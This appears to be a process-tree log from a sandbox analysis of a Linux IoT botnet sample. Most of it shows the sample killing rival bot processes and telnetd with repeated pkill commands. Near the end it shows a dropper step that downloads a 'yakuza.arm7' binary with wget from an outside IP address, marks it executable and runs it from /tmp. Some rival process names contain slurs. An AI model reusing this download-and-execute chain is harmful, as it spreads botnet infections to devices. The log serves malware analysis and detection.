/usr/bin/pkillpkill -9 scanspc4⤵PID:990
-
-
/bin/busyboxbusybox pkill -9 scanspc4⤵PID:991
-
-
-
/bin/shsh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"3⤵PID:1003
-
/usr/bin/pkillpkill -9 MELTEDNINJAREALZ4⤵PID:1004
-
-
/bin/busyboxbusybox pkill -9 MELTEDNINJAREALZ4⤵PID:1005
-
-
-
/bin/shsh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"3⤵PID:1013
-
/usr/bin/pkillpkill -9 flexsonskids4⤵PID:1014
-
-
/bin/busyboxbusybox pkill -9 flexsonskids4⤵PID:1017
-
-
-
/bin/shsh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"3⤵PID:1025
-
/usr/bin/pkillpkill -9 scanx864⤵
- Reads CPU attributes
PID:1026
-
-
/bin/busyboxbusybox pkill -9 scanx864⤵PID:1028
-
-
-
/bin/shsh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"3⤵PID:1034
-
/usr/bin/pkillpkill -9 MISAKI-U79OL4⤵
- Reads runtime system information
PID:1038
-
-
/bin/busyboxbusybox pkill -9 MISAKI-U79OL4⤵PID:1041
-
-
-
/bin/shsh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"3⤵PID:1045
-
/usr/bin/pkillpkill -9 foAxi102kxe4⤵PID:1048
-
-
/bin/busyboxbusybox pkill -9 foAxi102kxe4⤵PID:1054
-
-
-
/bin/shsh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"3⤵PID:1057
-
/usr/bin/pkillpkill -9 swodjwodjwoj4⤵
- Reads CPU attributes
PID:1058
-
-
/bin/busyboxbusybox pkill -9 swodjwodjwoj4⤵PID:1065
-
-
-
/bin/shsh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"3⤵PID:1070
-
/usr/bin/pkillpkill -9 MmKiy7f87l4⤵PID:1072
-
-
/bin/busyboxbusybox pkill -9 MmKiy7f87l4⤵PID:1073
-
-
-
/bin/shsh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"3⤵PID:1082
-
/usr/bin/pkillpkill -9 freecookiex864⤵PID:1084
-
-
/bin/busyboxbusybox pkill -9 freecookiex864⤵PID:1088
-
-
-
/bin/shsh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"3⤵PID:1095
-
/usr/bin/pkillpkill -9 sysgpu4⤵PID:1096
-
-
/bin/busyboxbusybox pkill -9 sysgpu4⤵PID:1097
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:1107
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵
- Reads CPU attributes
PID:1108
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:1109
-
-
-
/bin/shsh -c "pkill -9 frgege || busybox pkill -9 frgege"3⤵PID:1119
-
/usr/bin/pkillpkill -9 frgege4⤵
- Reads runtime system information
PID:1120
-
-
/bin/busyboxbusybox pkill -9 frgege4⤵PID:1121
-
-
-
/bin/shsh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"3⤵PID:1131
-
/usr/bin/pkillpkill -9 sysupdater4⤵
- Reads CPU attributes
PID:1132
-
-
/bin/busyboxbusybox pkill -9 sysupdater4⤵PID:1133
-
-
-
/bin/shsh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"3⤵PID:1142
-
/usr/bin/pkillpkill -9 0DnAzepd4⤵PID:1143
-
-
/bin/busyboxbusybox pkill -9 0DnAzepd4⤵PID:1145
-
-
-
/bin/shsh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"3⤵PID:1153
-
/usr/bin/pkillpkill -9 NiGGeRD0nks694⤵PID:1155
-
-
/bin/busyboxbusybox pkill -9 NiGGeRD0nks694⤵PID:1156
-
-
-
/bin/shsh -c "pkill -9 frgreu || busybox pkill -9 frgreu"3⤵PID:1164
-
/usr/bin/pkillpkill -9 frgreu4⤵
- Reads CPU attributes
PID:1165
-
-
/bin/busyboxbusybox pkill -9 frgreu4⤵PID:1171
-
-
-
/bin/shsh -c "pkill -9 telnetd || busybox pkill -9 telnetd"3⤵PID:1178
-
/usr/bin/pkillpkill -9 telnetd4⤵PID:1179
-
-
/bin/busyboxbusybox pkill -9 telnetd4⤵PID:1182
-
-
-
/bin/shsh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"3⤵PID:1190
-
/usr/bin/pkillpkill -9 0x766f69644⤵PID:1191
-
-
/bin/busyboxbusybox pkill -9 0x766f69644⤵PID:1192
-
-
-
/bin/shsh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"3⤵PID:1202
-
/usr/bin/pkillpkill -9 NiGGeRd0nks13374⤵PID:1203
-
-
/bin/busyboxbusybox pkill -9 NiGGeRd0nks13374⤵PID:1204
-
-
-
/bin/shsh -c "pkill -9 gaft || busybox pkill -9 gaft"3⤵PID:1212
-
/usr/bin/pkillpkill -9 gaft4⤵PID:1213
-
-
/bin/busyboxbusybox pkill -9 gaft4⤵PID:1216
-
-
-
/bin/shsh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"3⤵PID:1224
-
/usr/bin/pkillpkill -9 urasgbsigboa4⤵PID:1225
-
-
/bin/busyboxbusybox pkill -9 urasgbsigboa4⤵PID:1228
-
-
-
/bin/shsh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"3⤵PID:1235
-
/usr/bin/pkillpkill -9 120i3UI494⤵PID:1237
-
-
/bin/busyboxbusybox pkill -9 120i3UI494⤵PID:1240
-
-
-
/bin/shsh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"3⤵PID:1247
-
/usr/bin/pkillpkill -9 OaF34⤵
- Reads CPU attributes
PID:1249
-
-
/bin/busyboxbusybox pkill -9 OaF34⤵PID:1254
-
-
-
/bin/shsh -c "pkill -9 geae || busybox pkill -9 geae"3⤵PID:1260
-
/usr/bin/pkillpkill -9 geae4⤵PID:1263
-
-
/bin/busyboxbusybox pkill -9 geae4⤵PID:1267
-
-
-
/bin/shsh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"3⤵PID:1275
-
/usr/bin/pkillpkill -9 vaiolmao4⤵PID:1278
-
-
/bin/busyboxbusybox pkill -9 vaiolmao4⤵PID:1283
-
-
-
/bin/shsh -c "pkill -9 123123a || busybox pkill -9 123123a"3⤵PID:1288
-
/usr/bin/pkillpkill -9 123123a4⤵PID:1291
-
-
/bin/busyboxbusybox pkill -9 123123a4⤵PID:1295
-
-
-
/bin/shsh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"3⤵PID:1302
-
/usr/bin/pkillpkill -9 Ofurain0n4H34D4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1305
-
-
/bin/busyboxbusybox pkill -9 Ofurain0n4H34D4⤵PID:1307
-
-
-
/bin/shsh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"3⤵PID:1315
-
/usr/bin/pkillpkill -9 ggTrex4⤵PID:1316
-
-
/bin/busyboxbusybox pkill -9 ggTrex4⤵PID:1319
-
-
-
/bin/shsh -c "pkill -9 wasads || busybox pkill -9 wasads"3⤵PID:1327
-
/usr/bin/pkillpkill -9 wasads4⤵
- Reads runtime system information
PID:1329
-
-
/bin/busyboxbusybox pkill -9 wasads4⤵PID:1331
-
-
-
/bin/shsh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"3⤵PID:1339
-
/usr/bin/pkillpkill -9 1293194hjXD4⤵PID:1341
-
-
/bin/busyboxbusybox pkill -9 1293194hjXD4⤵PID:1344
-
-
-
/bin/shsh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"3⤵PID:1351
-
/usr/bin/pkillpkill -9 OthLaLosn4⤵PID:1352
-
-
/bin/busyboxbusybox pkill -9 OthLaLosn4⤵PID:1357
-
-
-
/bin/shsh -c "pkill -9 ggt || busybox pkill -9 ggt"3⤵PID:1365
-
/usr/bin/pkillpkill -9 ggt4⤵PID:1366
-
-
/bin/busyboxbusybox pkill -9 ggt4⤵PID:1368
-
-
-
/bin/shsh -c "pkill -9 wget-log || busybox pkill -9 wget-log"3⤵PID:1377
-
/usr/bin/pkillpkill -9 wget-log4⤵PID:1378
-
-
/bin/busyboxbusybox pkill -9 wget-log4⤵PID:1379
-
-
-
/bin/shsh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"3⤵PID:1389
-
/usr/bin/pkillpkill -9 1337SoraLOADER4⤵PID:1390
-
-
/bin/busyboxbusybox pkill -9 1337SoraLOADER4⤵PID:1393
-
-
-
/bin/shsh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"3⤵PID:1401
-
/usr/bin/pkillpkill -9 SAIAKINA4⤵
- Reads runtime system information
PID:1402
-
-
/bin/busyboxbusybox pkill -9 SAIAKINA4⤵PID:1405
-
-
-
/bin/shsh -c "pkill -9 ggtq || busybox pkill -9 ggtq"3⤵PID:1413
-
/usr/bin/pkillpkill -9 ggtq4⤵PID:1414
-
-
/bin/busyboxbusybox pkill -9 ggtq4⤵PID:1416
-
-
-
/bin/shsh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"3⤵PID:1425
-
/usr/bin/pkillpkill -9 1378bfp919GRB1Q24⤵PID:1426
-
-
/bin/busyboxbusybox pkill -9 1378bfp919GRB1Q24⤵PID:1427
-
-
-
/bin/shsh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"3⤵PID:1437
-
/usr/bin/pkillpkill -9 SAIAKUSO4⤵PID:1438
-
-
/bin/busyboxbusybox pkill -9 SAIAKUSO4⤵PID:1439
-
-
-
/bin/shsh -c "pkill -9 ggtr || busybox pkill -9 ggtr"3⤵PID:1449
-
/usr/bin/pkillpkill -9 ggtr4⤵PID:1450
-
-
/bin/busyboxbusybox pkill -9 ggtr4⤵PID:1453
-
-
-
/bin/shsh -c "pkill -9 14Fa || busybox pkill -9 14Fa"3⤵PID:1461
-
/usr/bin/pkillpkill -9 14Fa4⤵
- Reads runtime system information
PID:1462
-
-
/bin/busyboxbusybox pkill -9 14Fa4⤵PID:1465
-
-
-
/bin/shsh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"3⤵PID:1473
-
/usr/bin/pkillpkill -9 SEXSLAVE13374⤵PID:1474
-
-
/bin/busyboxbusybox pkill -9 SEXSLAVE13374⤵PID:1479
-
-
-
/bin/shsh -c "pkill -9 ggtt || busybox pkill -9 ggtt"3⤵PID:1485
-
/usr/bin/pkillpkill -9 ggtt4⤵PID:1487
-
-
/bin/busyboxbusybox pkill -9 ggtt4⤵PID:1491
-
-
-
/bin/shsh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"3⤵PID:1497
-
/usr/bin/pkillpkill -9 1902a3u912u3u44⤵PID:1500
-
-
/bin/busyboxbusybox pkill -9 1902a3u912u3u44⤵PID:1503
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:1511
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵PID:1512
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:1515
-
-
-
/bin/shsh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"3⤵PID:1523
-
/usr/bin/pkillpkill -9 haetrghbr4⤵PID:1525
-
-
/bin/busyboxbusybox pkill -9 haetrghbr4⤵PID:1527
-
-
-
/bin/shsh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"3⤵PID:1535
-
/usr/bin/pkillpkill -9 19ju3d4⤵PID:1536
-
-
/bin/busyboxbusybox pkill -9 19ju3d4⤵PID:1539
-
-
-
/bin/shsh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"3⤵PID:1547
-
/usr/bin/pkillpkill -9 SORAojkf1204⤵PID:1548
-
-
/bin/busyboxbusybox pkill -9 SORAojkf1204⤵PID:1551
-
-
-
/bin/shsh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"3⤵PID:1560
-
/usr/bin/pkillpkill -9 hehahejeje924⤵PID:1561
-
-
/bin/busyboxbusybox pkill -9 hehahejeje924⤵PID:1567
-
-
-
/bin/shsh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"3⤵PID:1573
-
/usr/bin/pkillpkill -9 2U2JDJA901F914⤵PID:1574
-
-
/bin/busyboxbusybox pkill -9 2U2JDJA901F914⤵PID:1578
-
-
-
/bin/shsh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"3⤵PID:1585
-
/usr/bin/pkillpkill -9 SlaVLav124⤵PID:1586
-
-
/bin/busyboxbusybox pkill -9 SlaVLav124⤵PID:1587
-
-
-
/bin/shsh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"3⤵PID:1597
-
/usr/bin/pkillpkill -9 helpmedaddthhhhh4⤵PID:1598
-
-
/bin/busyboxbusybox pkill -9 helpmedaddthhhhh4⤵PID:1599
-
-
-
/bin/shsh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"3⤵PID:1609
-
/usr/bin/pkillpkill -9 2wgg9qphbq4⤵PID:1610
-
-
/bin/busyboxbusybox pkill -9 2wgg9qphbq4⤵PID:1611
-
-
-
/bin/shsh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"3⤵PID:1621
-
/usr/bin/pkillpkill -9 Slav3Th3seD3vices4⤵PID:1622
-
-
/bin/busyboxbusybox pkill -9 Slav3Th3seD3vices4⤵PID:1623
-
-
-
/bin/shsh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"3⤵PID:1633
-
/usr/bin/pkillpkill -9 hzSmYZjYMQ4⤵PID:1634
-
-
/bin/busyboxbusybox pkill -9 hzSmYZjYMQ4⤵PID:1635
-
-
-
/bin/shsh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"3⤵PID:1645
-
/usr/bin/pkillpkill -9 5Gbf4⤵
- Reads CPU attributes
PID:1646
-
-
/bin/busyboxbusybox pkill -9 5Gbf4⤵PID:1647
-
-
-
/bin/shsh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"3⤵PID:1657
-
/usr/bin/pkillpkill -9 SoRAxD123LOL4⤵PID:1658
-
-
/bin/busyboxbusybox pkill -9 SoRAxD123LOL4⤵PID:1659
-
-
-
/bin/shsh -c "pkill -9 iaGv || busybox pkill -9 iaGv"3⤵PID:1668
-
/usr/bin/pkillpkill -9 iaGv4⤵PID:1670
-
-
/bin/busyboxbusybox pkill -9 iaGv4⤵PID:1673
-
-
-
/bin/shsh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"3⤵PID:1682
-
/usr/bin/pkillpkill -9 5aA34⤵PID:1683
-
-
/bin/busyboxbusybox pkill -9 5aA34⤵PID:1685
-
-
-
/bin/shsh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"3⤵PID:1694
-
/usr/bin/pkillpkill -9 SoRAxD420LOL4⤵PID:1695
-
-
/bin/busyboxbusybox pkill -9 SoRAxD420LOL4⤵PID:1699
-
-
-
/bin/shsh -c "pkill -9 insomni || busybox pkill -9 insomni"3⤵PID:1706
-
/usr/bin/pkillpkill -9 insomni4⤵PID:1708
-
-
/bin/busyboxbusybox pkill -9 insomni4⤵PID:1711
-
-
-
/bin/shsh -c "pkill -9 640277 || busybox pkill -9 640277"3⤵PID:1718
-
/usr/bin/pkillpkill -9 6402774⤵PID:1719
-
-
/bin/busyboxbusybox pkill -9 6402774⤵PID:1723
-
-
-
/bin/shsh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"3⤵PID:1731
-
/usr/bin/pkillpkill -9 SoraBeReppin13374⤵
- Reads runtime system information
PID:1732
-
-
/bin/busyboxbusybox pkill -9 SoraBeReppin13374⤵PID:1735
-
-
-
/bin/shsh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"3⤵
- System Network Configuration Discovery
PID:1743 -
/usr/bin/pkillpkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1744
-
-
/bin/busyboxbusybox pkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1745
-
-
-
/bin/shsh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"3⤵PID:1755
-
/usr/bin/pkillpkill -9 66tlGg9Q4⤵PID:1756
-
-
/bin/busyboxbusybox pkill -9 66tlGg9Q4⤵PID:1757
-
-
-
/bin/shsh -c "pkill -9 T || busybox pkill -9 T"3⤵PID:1767
-
/usr/bin/pkillpkill -9 T4⤵
- Reads CPU attributes
PID:1768
-
-
/bin/busyboxbusybox pkill -9 T4⤵PID:1770
-
-
-
/bin/shsh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"3⤵PID:1781
-
/usr/bin/pkillpkill -9 jUYfouyf874⤵
- Reads runtime system information
PID:1782
-
-
/bin/busyboxbusybox pkill -9 jUYfouyf874⤵PID:1783
-
-
-
/bin/shsh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"3⤵PID:1793
-
/usr/bin/pkillpkill -9 6ke34⤵
- Reads CPU attributes
PID:1794
-
-
/bin/busyboxbusybox pkill -9 6ke34⤵PID:1795
-
-
-
/bin/shsh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"3⤵PID:1805
-
/usr/bin/pkillpkill -9 TOKYO34⤵PID:1806
-
-
/bin/busyboxbusybox pkill -9 TOKYO34⤵PID:1807
-
-
-
/bin/shsh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"3⤵PID:1817
-
/usr/bin/pkillpkill -9 lyEeaXul2dULCVxh4⤵PID:1818
-
-
-
-
/bin/rmrm -rf yakuza.arm52⤵PID:777
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.arm72⤵
- Writes file to tmp directory
PID:782
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵PID:793
-
/bin/sh/bin/sh -c "pkill -9 902i13 || busybox pkill -9 902i13"3⤵PID:798
-
/usr/bin/pkillpkill -9 902i134⤵
- Reads runtime system information
PID:800
-
-
/bin/busyboxbusybox pkill -9 902i134⤵PID:809
-
-
-
/bin/sh/bin/sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:828 -
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵
- Reads runtime system information
PID:830
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵PID:838
-
-
-
/bin/sh/bin/sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:843 -
/usr/bin/pkillpkill -9 HOHO-LUGO74⤵PID:844
-
-
/bin/busyboxbusybox pkill -9 HOHO-LUGO74⤵PID:850
-
-
-
/bin/sh/bin/sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:865 -
/usr/bin/pkillpkill -9 HOHO-U79OL4⤵
- Reads CPU attributes
PID:866
-
-
/bin/busyboxbusybox pkill -9 HOHO-U79OL4⤵PID:874
-
-
-
/bin/sh/bin/sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:889 -
/usr/bin/pkillpkill -9 JuYfouyf874⤵
- Reads runtime system information
PID:891
-
-
/bin/busyboxbusybox pkill -9 JuYfouyf874⤵PID:899
-
-
-
/bin/sh/bin/sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:908 -
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵PID:909
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:910
-
-
-
/bin/sh/bin/sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:920 -
/usr/bin/pkillpkill -9 SO190Ij1X4⤵PID:921
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:922
-
-
-
/bin/sh/bin/sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:930 -
/usr/bin/pkillpkill -9 LOLKIKEEEDDE4⤵PID:933
-
-
/bin/busyboxbusybox pkill -9 LOLKIKEEEDDE4⤵PID:934
-
-
-
/bin/sh/bin/sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:943 -
/usr/bin/pkillpkill -9 ekjheory98e4⤵PID:944
-
-
/bin/busyboxbusybox pkill -9 ekjheory98e4⤵PID:946
-
-
-
/bin/sh/bin/sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"3⤵PID:953
-
/usr/bin/pkillpkill -9 scansh44⤵
- Reads runtime system information
PID:955
-
-
/bin/busyboxbusybox pkill -9 scansh44⤵PID:958
-
-
-
/bin/sh/bin/sh -c "pkill -9 MDMA || busybox pkill -9 MDMA"3⤵PID:967
-
/usr/bin/pkillpkill -9 MDMA4⤵PID:968
-
-
/bin/busyboxbusybox pkill -9 MDMA4⤵PID:969
-
-
-
/bin/sh/bin/sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:977 -
/usr/bin/pkillpkill -9 fdevalvex4⤵PID:983
-
-
/bin/busyboxbusybox pkill -9 fdevalvex4⤵PID:986
-
-
-
/bin/sh/bin/sh -c "pkill -9 scanspc || busybox pkill -9 scanspc"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:993 -
/usr/bin/pkillpkill -9 scanspc4⤵PID:994
-
-
/bin/busyboxbusybox pkill -9 scanspc4⤵PID:1000
-
-
-
/bin/sh/bin/sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1006 -
/usr/bin/pkillpkill -9 MELTEDNINJAREALZ4⤵PID:1007
-
-
/bin/busyboxbusybox pkill -9 MELTEDNINJAREALZ4⤵PID:1009
-
-
-
/bin/sh/bin/sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1018 -
/usr/bin/pkillpkill -9 flexsonskids4⤵
- Reads runtime system information
PID:1019
-
-
/bin/busyboxbusybox pkill -9 flexsonskids4⤵PID:1020
-
-
-
/bin/sh/bin/sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1030 -
/usr/bin/pkillpkill -9 scanx864⤵
- Reads CPU attributes
PID:1031
-
-
/bin/busyboxbusybox pkill -9 scanx864⤵PID:1032
-
-
-
/bin/sh/bin/sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"3⤵PID:1042
-
/usr/bin/pkillpkill -9 MISAKI-U79OL4⤵PID:1043
-
-
/bin/busyboxbusybox pkill -9 MISAKI-U79OL4⤵PID:1044
-
-
-
/bin/sh/bin/sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"3⤵PID:1051
-
/usr/bin/pkillpkill -9 foAxi102kxe4⤵
- Reads CPU attributes
PID:1052
-
-
/bin/busyboxbusybox pkill -9 foAxi102kxe4⤵PID:1056
-
-
-
/bin/sh/bin/sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"3⤵PID:1062
-
/usr/bin/pkillpkill -9 swodjwodjwoj4⤵PID:1063
-
-
/bin/busyboxbusybox pkill -9 swodjwodjwoj4⤵PID:1068
-
-
-
/bin/sh/bin/sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"3⤵PID:1075
-
/usr/bin/pkillpkill -9 MmKiy7f87l4⤵PID:1077
-
-
/bin/busyboxbusybox pkill -9 MmKiy7f87l4⤵PID:1079
-
-
-
/bin/sh/bin/sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"3⤵PID:1087
-
/usr/bin/pkillpkill -9 freecookiex864⤵PID:1091
-
-
/bin/busyboxbusybox pkill -9 freecookiex864⤵PID:1094
-
-
-
/bin/sh/bin/sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1102 -
/usr/bin/pkillpkill -9 sysgpu4⤵PID:1104
-
-
/bin/busyboxbusybox pkill -9 sysgpu4⤵PID:1105
-
-
-
/bin/sh/bin/sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1113 -
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵PID:1115
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:1118
-
-
-
/bin/sh/bin/sh -c "pkill -9 frgege || busybox pkill -9 frgege"3⤵PID:1127
-
/usr/bin/pkillpkill -9 frgege4⤵PID:1129
-
-
/bin/busyboxbusybox pkill -9 frgege4⤵PID:1130
-
-
-
/bin/sh/bin/sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1139 -
/usr/bin/pkillpkill -9 sysupdater4⤵
- Reads runtime system information
PID:1141
-
-
/bin/busyboxbusybox pkill -9 sysupdater4⤵PID:1144
-
-
-
/bin/sh/bin/sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1152 -
/usr/bin/pkillpkill -9 0DnAzepd4⤵PID:1154
-
-
/bin/busyboxbusybox pkill -9 0DnAzepd4⤵PID:1158
-
-
-
/bin/sh/bin/sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1167 -
/usr/bin/pkillpkill -9 NiGGeRD0nks694⤵
- Reads CPU attributes
- Reads runtime system information
PID:1169
-
-
/bin/busyboxbusybox pkill -9 NiGGeRD0nks694⤵PID:1173
-
-
-
/bin/sh/bin/sh -c "pkill -9 frgreu || busybox pkill -9 frgreu"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1180 -
/usr/bin/pkillpkill -9 frgreu4⤵PID:1185
-
-
/bin/busyboxbusybox pkill -9 frgreu4⤵PID:1189
-
-
-
/bin/sh/bin/sh -c "pkill -9 telnetd || busybox pkill -9 telnetd"3⤵PID:1195
-
/usr/bin/pkillpkill -9 telnetd4⤵
- Reads CPU attributes
PID:1198
-
-
/bin/busyboxbusybox pkill -9 telnetd4⤵PID:1201
-
-
-
/bin/sh/bin/sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"3⤵PID:1208
-
/usr/bin/pkillpkill -9 0x766f69644⤵
- Reads runtime system information
PID:1210
-
-
/bin/busyboxbusybox pkill -9 0x766f69644⤵PID:1214
-
-
-
/bin/sh/bin/sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"3⤵PID:1220
-
/usr/bin/pkillpkill -9 NiGGeRd0nks13374⤵
- Reads CPU attributes
PID:1222
-
-
/bin/busyboxbusybox pkill -9 NiGGeRd0nks13374⤵PID:1226
-
-
-
/bin/sh/bin/sh -c "pkill -9 gaft || busybox pkill -9 gaft"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1232 -
/usr/bin/pkillpkill -9 gaft4⤵PID:1234
-
-
/bin/busyboxbusybox pkill -9 gaft4⤵PID:1238
-
-
-
/bin/sh/bin/sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1244 -
/usr/bin/pkillpkill -9 urasgbsigboa4⤵PID:1245
-
-
/bin/busyboxbusybox pkill -9 urasgbsigboa4⤵PID:1250
-
-
-
/bin/sh/bin/sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"3⤵PID:1256
-
/usr/bin/pkillpkill -9 120i3UI494⤵PID:1257
-
-
/bin/busyboxbusybox pkill -9 120i3UI494⤵PID:1258
-
-
-
/bin/sh/bin/sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1270 -
/usr/bin/pkillpkill -9 OaF34⤵PID:1271
-
-
/bin/busyboxbusybox pkill -9 OaF34⤵PID:1272
-
-
-
/bin/sh/bin/sh -c "pkill -9 geae || busybox pkill -9 geae"3⤵PID:1281
-
/usr/bin/pkillpkill -9 geae4⤵PID:1282
-
-
/bin/busyboxbusybox pkill -9 geae4⤵PID:1284
-
-
-
/bin/sh/bin/sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"3⤵PID:1292
-
/usr/bin/pkillpkill -9 vaiolmao4⤵PID:1293
-
-
/bin/busyboxbusybox pkill -9 vaiolmao4⤵PID:1296
-
-
-
/bin/sh/bin/sh -c "pkill -9 123123a || busybox pkill -9 123123a"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1304 -
/usr/bin/pkillpkill -9 123123a4⤵PID:1306
-
-
